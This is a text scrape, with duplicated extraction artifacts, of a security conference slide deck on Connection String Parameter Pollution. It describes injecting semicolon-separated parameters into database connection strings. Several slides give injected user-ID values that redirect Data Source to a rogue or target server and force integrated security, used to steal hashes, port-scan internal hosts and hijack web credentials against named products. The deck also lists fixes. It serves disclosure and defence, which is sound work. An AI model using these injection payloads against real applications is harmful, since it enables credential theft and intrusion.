p Chema Alonso Chema Alonso Informtica 64 Informtica 64 Connection - - PowerPoint PPT Presentation

p chema alonso chema alonso inform tica 64 inform tica 64
SMART_READER_LITE
LIVE PREVIEW

p Chema Alonso Chema Alonso Informtica 64 Informtica 64 Connection - - PowerPoint PPT Presentation

Jun 15, 2023 130 likes •521 views

p Chema Alonso Chema Alonso Informtica 64 Informtica 64 Connection Strings Connection Strings Define the way an application connects to Define the way an application connects to data repository There are connection strings for:

slide-1
SLIDE 1

p Chema Alonso Chema Alonso Informática 64 Informática 64

slide-2
SLIDE 2

Connection Strings Connection Strings

  • Define the way an application connects to

Define the way an application connects to data repository

  • There are connection strings for:
  • There are connection strings for:

– Relational Databases (MSSQL, Oracle, MySQL,…) LDAP Di i – LDAP Directories – Files – Etc…

slide-3
SLIDE 3

Databases Connection Strings Databases Connection Strings Data Source = myServerAddress; Data Source = myServerAddress; Initial Catalog = myDataBase; Initial Catalog myDataBase; User Id = myUsername; Password = myPassword;

slide-4
SLIDE 4

Google Hacking Google Hacking

slide-5
SLIDE 5

Google Hacking Google Hacking

slide-6
SLIDE 6

UDL (Universal Data Links) Files UDL (Universal Data Links) Files

slide-7
SLIDE 7

Credentials Credentials

Operating System Accounts Database Credentials Operating System Accounts Data Source = myServerAddress; Database Credentials Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = SSPI/True/Yes; Password = myPassword; Integrated Security = No; SSPI/True/Yes;

slide-8
SLIDE 8

Users autheticated by Web App

Web application manages the login process

Syslogins Connection string 1.‐ Web applicaton connects using its credentials to the credentials to the database. 2.‐ Asks user login i f ti Custom users table information. 3.‐ Checks login information about info Select id from users stored in custom users table. Database Engine App running on Web Server

slide-9
SLIDE 9

Users autheticated by Database

Database engine manages the login process

1.‐ Web application asks for credentials. 2 i i Syslogins Connection string 2.‐ A connection string is composed with the credentials to connect to the database. 3.‐ Roles and permits are limited by the user sed in the connection used in the connection string Database Engine App running on Web Server

slide-10
SLIDE 10

Connection String Attacks Connection String Attacks

  • It´s possible to inject parameters into connection

It s possible to inject parameters into connection strings using semi colons as separators Data Source = myServerAddress; I iti l C t l D t B Initial Catalog = myDataBase; Integrated Security = NO; User Id = myUsername; Password = myPassword; Encryption = Off;

slide-11
SLIDE 11

ConnectionStringBuiler ConnectionStringBuiler

  • Available in .NET Framework 2.0
  • Build secure connection strings using parameters
  • It´s not possible to inject into the connection string
slide-12
SLIDE 12

Are people aware of this? Are people aware of this?

slide-13
SLIDE 13

Connection String Parameter Pollution Connection String Parameter Pollution

  • The goal is to inject parameters in the connection

e goa s to ject pa a ete s t e co ect o string, whether they exist or not

  • Had duplicated a parameter, the last value wins
  • This behavior allows attackers to re‐write

completly the connection string, therefore to manipulate the way the appliation will work and how should be the it authenticated

slide-14
SLIDE 14

Pollutionable Behavior Pollutionable Behavior

Param1=Value A Param2=Value B Param1=Value C Param2=Value D Param1=Value A Param2=Value B Param1=Value C Param2=Value D

DBConnection Object

Param1 Param1 Param2

slide-15
SLIDE 15

What can be done with CSPP? Rewrite a parameter

Data Source=DB1 UID=sa Data Source=DB2 password=Pwnd! Data Source=DB1 UID=sa Data Source=DB2 password=Pwnd!

DBConnection Object

DataSource DataSource UID password

slide-16
SLIDE 16

Scanning the DMZ Scanning the DMZ

Development

Database 1 Finnacial Database Test Database Forgotten Database Web app

I t t

Production

Data Source

FW

vulnerable to CSPP

Internet

Production Database

slide-17
SLIDE 17

Port Scanning a Server Port Scanning a Server

DataSource DB1,80 DB1,21 DataSource

FW

Web app vulnerable to CSPP

Internet

Production Database

DB1,25 DB1 1445

to CSPP Server

DB1,1445

slide-18
SLIDE 18

What can be done with CSPP? dd Add a parameter

Data Source=DB1 UID=sa Integrated Security=True password=Pwnd!

DBConnection Object

Data Source=DB1 UID=sa Integrated Security=True password=Pwnd! DataSource UID password password

slide-19
SLIDE 19

CSPP Attack 1: Hash stealing CSPP Attack 1: Hash stealing

1 ‐ Run a Rogue Server on an accessibl IP address:

  • 1. Run a Rogue Server on an accessibl IP address:

Rogue_Server 2 Activate a sniffer to catch the login process 2.‐ Activate a sniffer to catch the login process Cain/Wireshark 3.‐ Duplicate Data Source parameter Data_Source=Rogue_Server 4.‐ Force Windows Integrated Authentication Integrated Security=true g y

slide-20
SLIDE 20

CSPP Attack 1: Robo de Hash CSPP Attack 1: Robo de Hash

Data source = SQL2005; initial catalog = db1; Data source SQL2005; initial catalog db1; Integrated Security=no; user id=+’User_Value’+; Password=+’Password Value’+; Password=+ Password_Value +; D t SQL2005 i iti l t l db1 Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data S R S Source=Rogue_Server; Password=;Integrated Security=True;

slide-21
SLIDE 21

CSSP 1:ASP.NET Enterprise Manager CSSP 1:ASP.NET Enterprise Manager

slide-22
SLIDE 22

CSPP Attack 2: Port Scanning CSPP Attack 2: Port Scanning

1 ‐ Duplicate the Data Source parameter setting

  • 1. Duplicate the Data Source parameter setting
  • n it the Target server and target port to be

scanned scanned. Data_Source=Target_Server,target_Port 2 Check the error messages: 2.‐ Check the error messages: ‐ No TCP Connection ‐> Port is opened ‐ No SQL Server ‐> Port is closed ‐ SQL Server ‐> Invalid Password

slide-23
SLIDE 23

CSPP Attack 2: Port Scanning CSPP Attack 2: Port Scanning

Data source = SQL2005; initial catalog = db1; Data source SQL2005; initial catalog db1; Integrated Security=no; user id=+’User_Value’+; Password=+’Password Value’+; Password=+ Password_Value +; D t SQL2005 i iti l t l db1 Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data S T t S T t P t Source=Target_Server, Target_Port; Password=;Integrated Security=True;

slide-24
SLIDE 24

CSPP 2: myLittleAdmin CSPP 2: myLittleAdmin

Port is Opened Port is Opened

slide-25
SLIDE 25

CSPP 2: myLittleAdmin CSPP 2: myLittleAdmin

Port is Closed Port is Closed

slide-26
SLIDE 26

CSPP Attack 3: Hijacking Web Credentials CSPP Attack 3: Hijacking Web Credentials

1 ‐ Duplicate Data Source parameter to the

  • 1. Duplicate Data Source parameter to the

target SQL Server Data Source=Target Server Data_Source=Target_Server 2.‐ Force Windows Authentication Integrated Security=true 3.‐ Application pool in which the web app is pp p pp running on will send its credentials in order to log in to the database engine. g g

slide-27
SLIDE 27

CSPP Attack 3: Hijacking Web Credentials CSPP Attack 3: Hijacking Web Credentials

Data source = SQL2005; initial catalog = db1; Data source SQL2005; initial catalog db1; Integrated Security=no; user id=+’User_Value’+; Password=+’Password Value’+; Password=+ Password_Value +; D t SQL2005 i iti l t l db1 Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data S T t S Source=Target_Server; Password=;Integrated Security=true;

slide-28
SLIDE 28

CSPP Attack 3: Web Data Administrator CSPP Attack 3: Web Data Administrator

slide-29
SLIDE 29

CSPP Attack 3: l d / l k myLittleAdmin/myLittleBackup

slide-30
SLIDE 30

CSPP Attack 3: ASP.NET Enterprise Manager CSPP Attack 3: ASP.NET Enterprise Manager

slide-31
SLIDE 31

Other Databases Other Databases

  • MySQL

– Does not support Integrated security – It´s possible to manipulate the behavior of the web application, although

  • Port Scanning
  • Connect to internal/testing/for developing Databases
  • Oracle supports integrated authority running on Windows

d UNIX/Li and UNIX/Linux servers

– It´s possible to perform all described attacks

  • Hash stealing

P t S i

  • Port Scanning
  • Hijacking Web credentials

– Also it´s possible to elevate a connection to sysdba in order to shutdown/startup an instance shutdown/startup an instance

slide-32
SLIDE 32
slide-33
SLIDE 33

myLittleAdmin/myLittleBackup myLittleAdmin/myLittleBackup

myLittleTools released a secury advisory and a patch about this

slide-34
SLIDE 34

ASP.NET Enterprise Manager ASP.NET Enterprise Manager

  • ASP.NET Enterprise Manager is “abandoned”, but it´s

been used in a lot of web Control Panels.

  • Fix the code yourself

Fix the code yourself

slide-35
SLIDE 35

ASP.NET Enterprise Manager ASP.NET Enterprise Manager

  • ASP.NET Enterprise Manager is “abandoned”, but it´s

been used in a lot of web Control Panels been used in a lot of web Control Panels. h lf

  • Fix the code yourself
slide-36
SLIDE 36

ASP.NET Web Data Admistrator ASP.NET Web Data Admistrator

ASP Web Data Administrator is secure in CodePlex web site, but not in Microsoft web site where is been published an unsecure old version

slide-37
SLIDE 37

Countermeasures Countermeasures

  • Harden your firewall

a de you e a

– Outbound connections

  • Harden your internal accounts

y

– Web application – Web server – Database Engine

  • Use ConnectionStringBuilder
  • Filter the ;)
slide-38
SLIDE 38

Questions? Questions?

Contacto Chema Alonso chema@informatica64.com http://www.informatica64.com http://elladodelmal.blogspot.com Palako palakko@lateatral.com Authors Chema Alonso Manuel Fernández “The Sur” Alejandro Martín Bailón Antonio Guzmán